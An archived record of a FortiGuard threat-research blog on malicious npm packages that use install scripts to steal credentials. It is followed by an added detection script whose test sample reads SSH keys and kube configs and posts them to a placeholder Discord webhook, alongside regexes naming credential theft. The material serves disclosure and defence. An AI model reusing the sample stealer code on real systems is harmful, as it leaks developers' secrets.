{
	"id": "900a9625-f2ce-4f59-a43e-62ab86256589",
	"created_at": "2026-04-06T00:15:24.99568Z",
	"updated_at": "2026-04-10T03:21:56.427644Z",
	"deleted_at": null,
	"sha1_hash": "914640e1a4872165214d47e9730b3cfc13d8fe0d",
	"title": "Malicious Packages Hidden in NPM | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62874,
	"plain_text": "Malicious Packages Hidden in NPM | FortiGuard Labs\r\nBy Jin Lee, Jenna Wang\r\nPublished: 2023-10-02 · Archived: 2026-04-05 21:08:04 UTC\r\nAffected platforms: All platforms where NPM packages can be installed\r\nImpacted parties: Any individuals or institutions that have these malicious packages installed\r\nImpact: Leak of credentials, sensitive information, source code, etc.\r\nSeverity level: High\r\nOver the past few months, the FortiGuard Labs team has discovered several malicious packages hidden in NPM (Node Package Manager), the largest software registry for the JavaScript programming language. These packages were found through a system dedicated to discovering malicious open-source packages across ecosystems such as PyPI and NPM. In this blog, we look at some of these packages, grouping them by similar styles of code or functionality.\r\nIn general, most of these malicious packages rely on lifecycle install scripts: preinstall, install, or postinstall entries under scripts in package.json. npm runs those scripts automatically whenever the package is installed, including when it is pulled in as a dependency of something else, so the payload executes without the victim ever importing the package. An example of this is shown below.\r\nEvery package we found aims to steal sensitive data, such as system or user information, via a webhook or file-sharing link. Let’s explore the sets of packages below.\r\nThe First Set:\r\n@expue/webpack (version 0.0.3-alpha.0)\r\n@expue/core (version 0.0.3-alpha.0)\r\n@expue/vue3-renderer (version 0.0.3-alpha.0)\r\n@fixedwidthtable/fixedwidthtable (version 0.0.2)\r\n@virtualsearchtable/virtualsearchtable (version 0.1.1)\r\nThis first set ships an obfuscated index.js script. Even so, several strings in it are enough to raise suspicion. Let’s simplify the code.\r\nAfter cleaning up the script, we can see it exfiltrates sensitive data, including Kubernetes configurations, SSH keys, and other critical information. 
It also gathers basic system fingerprinting details, such as username, IP address, and hostname, without any prior warning.\r\nThe Second Set:\r\nbinarium-crm (versions 1.0.0, 1.0.9, 1.9.9)\r\ncareer-service-client (versions 0.1.6, 0.1.13, 0.1.15)\r\nhh-dep-monitoring (versions 0.1.5, 0.1.14)\r\norbitplate (versions 1.0.4, 1.0.6)\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 1 of 9\n\nThe index.js in this second set of packages sends an HTTP GET request to a specific URL, including query parameters. It scans for particular files and directories that may contain sensitive information, which enables the unauthorized extraction of critical developer data such as source code and configuration files. The targeted files and directories may hold highly valuable intellectual property and sensitive information, such as credentials for various applications and services. The script then archives these files and directories and uploads the resulting archives to an FTP server.\r\nThe Third Set:\r\n@zola-helpers/client (versions 1.0.1, 1.0.2, 1.0.3)\r\nsuncorp-styleguide-base (versions 1.0.3, 1.0.4, 1.0.5)\r\nIn this set, the index.mjs install script uses a Discord webhook to exfiltrate sensitive data, such as system information, username, and folder contents.\r\nThe Fourth Set:\r\n@next-translate-root/i18n (versions 1.0.1, 1.0.2)\r\n@ag-grid-react/lib (version 1.0.1)\r\n@next-translate-root/locales (versions 1.0.0, 1.0.1, 1.0.2)\r\nAs with the third set, this fourth set also uses an index.mjs install script and a Discord webhook to exfiltrate sensitive data. 
But this time, they use an alternate style of coding.\r\nThe Fifth Set:\r\n@dtx-company/flowcode-generator-types (version 200000.0.2)\r\nThis fifth set uses an index.js install script to exfiltrate the hostname, the username, and the contents of the user’s home directory via a webhook.\r\nThe Sixth Set:\r\nsquarespace-abtest (version 1.0.1)\r\nruamel.taml.clib (version 0.1.2)\r\nregily (version 1.0.0)\r\ndeveloper-scaffold-full-width-wrapper (versions 1.9.9, 21.0.9)\r\n@abb-americas/angular-utilities (version 1.0.0)\r\n@abb-americas/image-scaler (version 1.0.0)\r\n@abdulmz/mz-test (version 1.1.1)\r\n@ikea-aoa/component-financial-services (version 99.0.1)\r\n@ikea-aoa/component-lightbox (version 99.0.1)\r\n@ikea-aoa/component-popover (version 99.0.0)\r\nThis set, the most commonly found style, uses yet another index.js install script to exfiltrate information.\r\nThe Seventh Set:\r\n@cima/prism-utils (versions 23.2.1, 23.2.2)\r\nIn this set, the packages use an installer.js install script to carry out the attack, similar to the previous two sets, but with one addition: the environment variable ‘NODE_TLS_REJECT_UNAUTHORIZED’ is set to ‘0’. 
This disables TLS certificate validation for every TLS connection the Node process makes, so the script’s outbound connection succeeds even where the server certificate would otherwise be rejected (for example behind an inspecting proxy or against a self-signed server), and every such connection is exposed to man-in-the-middle attacks.\r\nThe Eighth Set:\r\ndiscorddd.jss (versions 1.4.9, 1.5.0, 1.6.4)\r\nsaaaaaaaaaaaaaaaaaaaaaaa (version 1.4.1)\r\nThese packages automatically download a potentially malicious executable file from a URL into a directory under C:/ (a Windows path) and run it.\r\nThe Ninth Set:\r\nevernote-thrift (version 1.9.99)\r\nen-features-rollout (version 1.90.9)\r\nen-conduit-electron (version 1.90.9)\r\nen-conduit-electron-auth (version 1.90.9)\r\nen-conduit-electron-worker (version 1.90.9)\r\nen-thrift-internal (version 2.30.9)\r\nen-conduit-electron-renderer (version 1.90.9)\r\nThese packages use another script style to gather system information, including the victim’s public IP address, and then exfiltrate it to a Discord webhook.\r\nConclusion\r\nThis blog groups a collection of malicious NPM packages that use install scripts to steal users’ sensitive information, based on their styles of code or functionality. Many of the names above mimic organizations’ internal packages and carry inflated version numbers such as 99.0.1 or 200000.0.2, the usual shape of a dependency-confusion attempt: a public package published under a private package’s name with a higher version, so that a misconfigured resolver prefers it over the private one. End users should watch for packages that employ suspicious install scripts, make sure private scopes resolve only to their private registry, and exercise caution. 
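The check this recommendation calls for can be automated. The script below is an added example written for this page, not code from the FortiGuard post or from any of the packages it names: it reads a package’s package.json, lists the lifecycle hooks that npm would run on install (preinstall, install, postinstall, prepare), and scans the package’s script files for the traits the sets above share (Discord webhook URLs, NODE_TLS_REJECT_UNAUTHORIZED set to 0, reads of .kube/config and .ssh, home-directory listings, host fingerprinting, FTP endpoints, child_process use). The three sample packages, their file contents and the webhook path are constructed for the example and are not the real packages; the indicator list is a starting point an analyst would extend, not a complete signature set.

```javascript
// Added example for this page (not code from the FortiGuard post or from the
// packages it lists): triage a package's files for the install-hook traits
// described above before anything is installed. Runs offline on the
// constructed samples below; in practice the files object would be filled
// from an extracted npm pack tarball with fs.readFileSync.

// Lifecycle scripts npm runs automatically when a package is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators drawn from the nine sets above. Character classes such as [.]
// and [/] are used instead of backslash escapes.
const INDICATORS = [
  { name: 'discord-webhook', re: /discord(app)?[.]com[/]api[/]webhooks[/]/i },
  { name: 'tls-verification-disabled', re: /NODE_TLS_REJECT_UNAUTHORIZED[^0-9a-z]{0,6}0/i },
  { name: 'kube-config', re: /[.]kube[/]config/ },
  { name: 'ssh-keys', re: /[.]ssh[/]/ },
  { name: 'ftp-upload', re: /ftp:[/][/]/i },
  { name: 'host-fingerprint', re: /os[.](hostname|userInfo|networkInterfaces)[(]/ },
  { name: 'home-dir-listing', re: /readdirSync[(]os[.]homedir[(][)]/ },
  { name: 'spawns-process', re: /child_process/ },
];

// Hooks declared under scripts in package.json, with the command each runs.
function lifecycleHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Every indicator hit in every JavaScript file of the package. All script
// files are scanned, not only the one the hook names, because the hook's
// entry file can simply require() the file that does the work.
function findIndicators(files) {
  const hits = [];
  for (const [path, content] of Object.entries(files)) {
    if (!/[.][cm]?js$/.test(path)) continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(content)) hits.push({ file: path, indicator: ind.name });
    }
  }
  return hits;
}

// files: map of relative path -> file content for one extracted package.
// A hook alone or indicators alone is 'review'; both together is 'high'.
function scanPackage(files) {
  const pkg = JSON.parse(files['package.json']);
  const hooks = lifecycleHooks(pkg);
  const indicators = findIndicators(files);
  let verdict = 'low';
  if (hooks.length > 0 && indicators.length > 0) verdict = 'high';
  else if (hooks.length > 0 || indicators.length > 0) verdict = 'review';
  return { name: pkg.name, version: pkg.version, hooks, indicators, verdict };
}

// Constructed samples. Names, versions, file contents and the webhook path
// are invented for this example; none of it is taken from the real packages.
const SUSPICIOUS = {
  'package.json': JSON.stringify({
    name: 'example-internal-widget', version: '99.0.1',
    scripts: { postinstall: 'node index.js' },
  }),
  'index.js': `
    const os = require('os');
    const fs = require('fs');
    const https = require('https');
    process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';
    const report = {
      user: os.userInfo().username,
      host: os.hostname(),
      home: fs.readdirSync(os.homedir()),
      ssh: fs.readdirSync(os.homedir() + '/.ssh/'),
      kube: fs.readFileSync(os.homedir() + '/.kube/config', 'utf8'),
    };
    const req = https.request('https://discord.com/api/webhooks/0/placeholder', { method: 'POST' });
    req.end(JSON.stringify(report));
  `,
};
const NATIVE_ADDON = {
  'package.json': JSON.stringify({
    name: 'example-native-addon', version: '2.1.0',
    scripts: { install: 'node-gyp rebuild' },
  }),
  'index.js': `module.exports = require('./build/Release/addon.node');`,
};
const PLAIN = {
  'package.json': JSON.stringify({ name: 'example-left-pad', version: '1.0.0' }),
  'index.js': `module.exports = (s, n) => s.padStart(n);`,
};

for (const sample of [SUSPICIOUS, NATIVE_ADDON, PLAIN]) {
  const r = scanPackage(sample);
  console.log(r.name, r.version, r.verdict, r.indicators.map((i) => i.indicator).join(','));
}
```

Run it with node against the directory that npm pack followed by tar xf produces, before the package is ever installed. A hook on its own is not proof of malice (native addons legitimately run node-gyp from an install hook, which is why the second sample is only marked for review), but a hook combined with any of the indicators deserves a manual read of the script. Two blanket mitigations follow from how these packages work: npm install --ignore-scripts (or ignore-scripts=true in .npmrc) stops lifecycle hooks from running at all, and private scopes should be bound to the private registry with a scope-to-registry entry in .npmrc so that a public package with an inflated version number cannot shadow them.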
We will continue hunting for and reporting malicious packages to help users avoid becoming victims.\r\nFortinet Protections\r\nFortiGuard AntiVirus detects the malicious files identified in this report as follows:\r\n@zola-helpers/client-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@zola-helpers/client-1.0.2 index.mjs: JS/WebHook.CNYS!tr\r\n@zola-helpers/client-1.0.3 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/i18n-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/i18n-1.0.2 index.mjs: JS/WebHook.CNYS!tr\r\nsuncorp-styleguide-base-1.0.3 index.mjs: JS/WebHook.CNYS!tr\r\nsuncorp-styleguide-base-1.0.4 index.mjs: JS/WebHook.CNYS!tr\r\nsuncorp-styleguide-base-1.0.5 index.mjs: JS/WebHook.CNYS!tr\r\n@ag-grid-react/lib-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/locales-1.0.0 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/locales-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/locales-1.0.2 index.mjs: JS/WebHook.CNYS!tr\r\n@dtx-company/flowcode-generator-types-200000.0.2 index.js: JS/Agent.OAST!tr\r\nsquarespace-abtest-1.0.1 index.js: JS/Agent.OAST!tr\r\nruamel.taml.clib-0.1.2 index.js: JS/Agent.OAST!tr\r\nregily-1.0.0 index.js: JS/Agent.OAST!tr\r\ndeveloper-scaffold-full-width-wrapper-1.9.9 index.js: JS/Agent.OAST!tr\r\ndeveloper-scaffold-full-width-wrapper-21.0.9 index.js: JS/Agent.OAST!tr\r\n@abb-americas/angular-utilities-1.0.0 index.js: JS/Agent.OAST!tr\r\n@abb-americas/image-scaler-1.0.0 index.js: JS/Agent.OAST!tr\r\n@abdulmz/mz-test-1.1.1 index.js: JS/Agent.OAST!tr\r\n@ikea-aoa/component-financial-services-99.0.1 index.js: JS/Agent.OAST!tr\r\n@ikea-aoa/component-lightbox-99.0.1 index.js: JS/Agent.OAST!tr\r\n@ikea-aoa/component-popover-99.0.0 index.js: JS/Agent.OAST!tr\r\n@cima/prism-utils-23.2.1 installer.js: JS/Agent.OAST!tr.dldr\r\n@cima/prism-utils-23.2.2 installer.js: JS/Agent.OAST!tr.dldr\r\ndiscorddd.jss-1.4.9 index.js: 
JS/Agent.CDPC!tr.dldr\r\ndiscorddd.jss-1.5.0 index.js: JS/Agent.CDPC!tr.dldr\r\ndiscorddd.jss-1.6.4 index.js: JS/Agent.CDPC!tr.dldr\r\nsaaaaaaaaaaaaaaaaaaaaaaa-1.4.2 index.js: JS/Agent.CDPC!tr.dldr\r\nevernote-thrift-1.9.99 index.js: JS/WebHook.ESY!tr\r\nen-features-rollout-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-auth-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-worker-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-thrift-internal-2.30.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-renderer-1.90.9 index.js: JS/WebHook.ESY!tr\r\n@expue/webpack-0.0.3-alpha.0 index.js: JS/Agent.ATTC!tr\r\n@expue/core-0.0.3-alpha.0 index.js: JS/Agent.ATTC!tr\r\n@expue/vue3-renderer-0.0.3-alpha.0 index.js: JS/Agent.ATTC!tr\r\n@fixedwidthtable/fixedwidthtable-0.0.2 index.js: JS/Agent.ATTC!tr\r\n@virtualsearchtable/virtualsearchtable-0.1.1 index.js: JS/Agent.ATTC!tr\r\nbinarium-crm-1.0.0 index.js: JS/Agent.CFRE!tr.dldr\r\nbinarium-crm-1.0.9 index.js: JS/Agent.CFRE!tr.dldr\r\nbinarium-crm-1.9.9 index.js: JS/Agent.CFRE!tr.dldr\r\ncareer-service-client-0.1.6 index.js: JS/Agent.CFRE!tr.dldr\r\ncareer-service-client-0.1.13 index.js: JS/Agent.CFRE!tr.dldr\r\ncareer-service-client-0.1.15 index.js: JS/Agent.CFRE!tr.dldr\r\nhh-dep-monitoring-0.1.5 index.js: JS/Agent.CFRE!tr.dldr\r\nhh-dep-monitoring-0.1.14 index.js: JS/Agent.CFRE!tr.dldr\r\norbitplate-1.0.4 index.js: JS/Agent.CFRE!tr.dldr\r\norbitplate-1.0.6 index.js: JS/Agent.CFRE!tr.dldr\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. 
Customers running current AntiVirus updates are protected.\r\nThe FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.\r\nThe FortiDevSec SCA scanner detects malicious packages, including those cited in this report, that may be present as dependencies in users' projects during test phases, and prevents those dependencies from being introduced into users' products.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.\r\nIOCs\r\n@zola-helpers/client-1.0.1 index.mjs\r\n    MD5: e905c2915762e6c1fa57ff3b444411da\r\n@zola-helpers/client-1.0.2 index.mjs\r\n    MD5: 1e5a38b17453379af9107a9afce0963f\r\n@zola-helpers/client-1.0.3 index.mjs\r\n    MD5: c7325f2347833eba9869926226027330\r\n@next-translate-root/i18n-1.0.1 index.mjs\r\n    MD5: cb37bd25c3011ffdd10c0db976c77b45\r\n@next-translate-root/i18n-1.0.2 index.mjs\r\n    MD5: c4bf513d91909de6d8c8e28fe317950a\r\nsuncorp-styleguide-base-1.0.3 index.mjs\r\n    MD5: 404c75ee8c8a2241e94773a5f46cd372\r\nsuncorp-styleguide-base-1.0.4 index.mjs\r\n    MD5: 0b4da6e4a3d7f0d43afc1ce5a567aeed\r\nsuncorp-styleguide-base-1.0.5 index.mjs\r\n    MD5: fbf108d9534e2a065ba62198d7ab226c\r\n@ag-grid-react/lib-1.0.1 index.mjs\r\n    MD5: 42d7f4f9e4d837c5f1217165e92d0136\r\n@next-translate-root/locales-1.0.0 index.mjs\r\n    MD5: 312368807bee4e8876acec4dba528f13\r\n@next-translate-root/locales-1.0.1 index.mjs\r\n    MD5: cb37bd25c3011ffdd10c0db976c77b45\r\n@next-translate-root/locales-1.0.2 index.mjs\r\n    MD5: c4bf513d91909de6d8c8e28fe317950a\r\n@dtx-company/flowcode-generator-types-200000.0.2 index.js\r\n    MD5: 1b80da13c2d440b51de3e3b1f84b30b6\r\nsquarespace-abtest-1.0.1 index.js\r\n    MD5: 
0976fc4401a315d8182828d07b0e4a02\r\nruamel.taml.clib-0.1.2 index.js\r\n    MD5: 489af9e516d133f8341bc50068b3a505\r\nregily-1.0.0 index.js\r\n    MD5: 8333f68439addfe5d80d7cf8646d74f6\r\ndeveloper-scaffold-full-width-wrapper-1.9.9 index.js\r\n    MD5: c627ce5ec695ea663b88a09fb31ea319\r\ndeveloper-scaffold-full-width-wrapper-21.0.9 index.js\r\n    MD5: 563cf757e5f61a592f53506c81360e4a\r\n@abb-americas/angular-utilities-1.0.0 index.js\r\n    MD5: 2965d88976fee79d1e3ef69e5edc5d83\r\n@abb-americas/image-scaler-1.0.0 index.js\r\n    MD5: 0876c5969dc829f2f56b455ae38a2536\r\n@abdulmz/mz-test-1.1.1 index.js\r\n    MD5: ecd47a29a7e5132f94b1c7c0689e2e5a\r\n@ikea-aoa/component-financial-services-99.0.1 index.js\r\n    MD5: 025809495e179b4f7ef0db8af88381e7\r\n@ikea-aoa/component-lightbox-99.0.1 index.js\r\n    MD5: 025809495e179b4f7ef0db8af88381e7\r\n@ikea-aoa/component-popover-99.0.0 index.js\r\n    MD5: 025809495e179b4f7ef0db8af88381e7\r\n@cima/prism-utils-23.2.1 installer.js\r\n    MD5: 42d84beccb38c08700920b70549f5a87\r\n@cima/prism-utils-23.2.2 installer.js\r\n    MD5: 25de187869441c3aa506ddc5fe6839ea\r\ndiscorddd.jss-1.4.9 index.js\r\n    MD5: dc60d3e82ff0273309a2a9e1b7f89ea3\r\ndiscorddd.jss-1.5.0 index.js\r\n    MD5: 740eca0a347fe0d0aa8ca8ec4ebf2dd2\r\ndiscorddd.jss-1.6.4 index.js\r\n    MD5: 5182a61ee33247e2a426c4ddfe8196dc\r\nsaaaaaaaaaaaaaaaaaaaaaaa-1.4.2 index.js\r\n    MD5: 8458b6a4196e5d86e241c758ce89d1e5\r\nevernote-thrift-1.9.99 index.js\r\n    MD5: 359f456996c39e7882afeda8fbbf226f\r\nen-features-rollout-1.90.9 index.js\r\n    MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-1.90.9 index.js\r\n    MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-auth-1.90.9 
index.js\r\n    MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-worker-1.90.9 index.js\r\n    MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-thrift-internal-2.30.9 index.js\r\n    MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-renderer-1.90.9 index.js\r\n    MD5: 0f67856db1e0c466d13079cc9cb16963\r\n@expue/webpack-0.0.3-alpha.0 index.js\r\n    MD5: 084c4c5a1d36fbdab6705a2fbd7e849e\r\n@expue/core-0.0.3-alpha.0 index.js\r\n    MD5: 8b82f6112b22bd67cccc4ad238bfea7c\r\n@expue/vue3-renderer-0.0.3-alpha.0 index.js\r\n    MD5: 084c4c5a1d36fbdab6705a2fbd7e849e\r\n@fixedwidthtable/fixedwidthtable-0.0.2 index.js\r\n    MD5: 084c4c5a1d36fbdab6705a2fbd7e849e\r\n@virtualsearchtable/virtualsearchtable-0.1.1 index.js\r\n    MD5: 37f9d6a97af8d7589bbc11aadcf185ec\r\nbinarium-crm-1.0.0 index.js\r\n    MD5: acf9777d3fabc82b49ddb096147de6a9\r\nbinarium-crm-1.0.9 index.js\r\n    MD5: acf9777d3fabc82b49ddb096147de6a9\r\nbinarium-crm-1.9.9 index.js\r\n    MD5: acf9777d3fabc82b49ddb096147de6a9\r\ncareer-service-client-0.1.6 index.js\r\n    MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\ncareer-service-client-0.1.13 index.js\r\n    MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\ncareer-service-client-0.1.15 index.js\r\n    MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\nhh-dep-monitoring-0.1.5 index.js\r\n    MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\nhh-dep-monitoring-0.1.14 index.js\r\n    MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\norbitplate-1.0.4 index.js\r\n    MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\norbitplate-1.0.6 index.js\r\n    MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\nSource: 
https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm"
	],
	"report_names": [
		"malicious-packages-hiddin-in-npm"
	],
	"threat_actors": [],
	"ts_created_at": 1775434524,
	"ts_updated_at": 1775791316,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/914640e1a4872165214d47e9730b3cfc13d8fe0d.pdf",
		"text": "https://archive.orkl.eu/914640e1a4872165214d47e9730b3cfc13d8fe0d.txt",
		"img": "https://archive.orkl.eu/914640e1a4872165214d47e9730b3cfc13d8fe0d.jpg"
	}
}